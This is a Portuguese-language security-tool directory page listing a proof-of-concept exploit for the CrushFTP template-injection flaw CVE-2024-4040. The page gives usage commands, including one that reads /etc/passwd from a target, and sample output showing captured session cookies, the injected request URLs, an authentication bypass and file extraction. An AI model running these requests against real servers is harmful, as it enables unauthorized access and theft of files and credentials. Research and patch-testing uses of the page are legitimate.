Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
GenCrushSSTIExploit — é um PoC para o CVE-2024-4040, ferramenta para explorar a vulnerabilidade SSTI no CrushFTP | Kitploit
Ferramentas/GitHubGitHub/geniuszly/gencrushsstiexploit
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoAprendizado e Educação
GitHubgeniuszly/gencrushsstiexploit

GenCrushSSTIExploit

é um PoC para o CVE-2024-4040, ferramenta para explorar a vulnerabilidade SSTI no CrushFTP

Ver Repositório
81há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

GenCrushSSTIExploit é uma ferramenta de exploração PoC direcionada à vulnerabilidade SSTI (Injeção de Template do Lado do Servidor) no CrushFTP CVE-2024-4040. Esta ferramenta demonstra como explorar esta vulnerabilidade apenas para fins educacionais e de hacking ético.

Funcionalidades

  • Estabelece uma sessão com o servidor CrushFTP para extrair cookies de autenticação.
  • Explora a vulnerabilidade SSTI para injetar payloads.
  • Tenta contornar a autenticação e extrair arquivos sensíveis do servidor.
  • Utiliza rich para uma saída de console bonita e estilizada.

Aviso Legal

⚠️ Use esta ferramenta com responsabilidade! Destina-se apenas a fins de pesquisa e educacionais. O autor não se responsabiliza por qualquer uso indevido ou danos causados por esta ferramenta.

Instalação

Pré-requisitos

  • Python 3.7+
  • pip (instalador de pacotes Python)

Clonar o Repositório

root@kitploit:~
git clone https://github.com/geniuszly/GenCrushSSTIExploit
cd GenCrushSSTIExploit

Instalar Pacotes Necessários

root@kitploit:~
pip install -r requirements.txt

Uso

Comando Básico

root@kitploit:~
python GenCrushSSTIExploit.py -t <URL_ALVO>
  • -t / --target: Especifica a URL do servidor CrushFTP vulnerável.

Parâmetros Opcionais

  • -l / --lfi: Inclusão de Arquivo Local. Especifica o arquivo a ser incluído para extração.
  • -w / --wordlist: Especifica uma wordlist para brute-force de caminhos de arquivos.

Exemplo

root@kitploit:~
python GenCrushSSTIExploit.py -t http://example.com -l /etc/passwd

Exemplo de Saída

root@kitploit:~
★ Добро пожаловать в GenCrushSSTIExploit ★
CrushFTP SSTI PoC (CVE-2024-4040)
Автор: geniuszly
Использование: только для учебных и этических целей
--------------------------------------------------

[*] Подключение к ServerSessionAJAX...

[+] Успешно подключено к ServerSessionAJAX
[+] Куки CrushAuth: abc123def456ghi789
[+] Куки currentAuth: xyz987

[*] Попытка эксплуатации уязвимости SSTI...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={hostname}&names=/a

[+] Успешная эксплуатация уязвимости SSTI
[+] Ответ сервера: Hostname: example.com

[*] Попытка обхода аутентификации...

[+] URL: http://example.com/WebInterface/function/?c2f=xyz987&command=zip&path={working_dir}&names=/a

[+] Обход аутентификации успешен
[+] Извлечение /etc/passwd...
[+] Успешное извлечение /etc/passwd
[+] Извлеченное содержимое:
root:x:0:0:root:/root:/bin/bash
...
Baixar ferramenta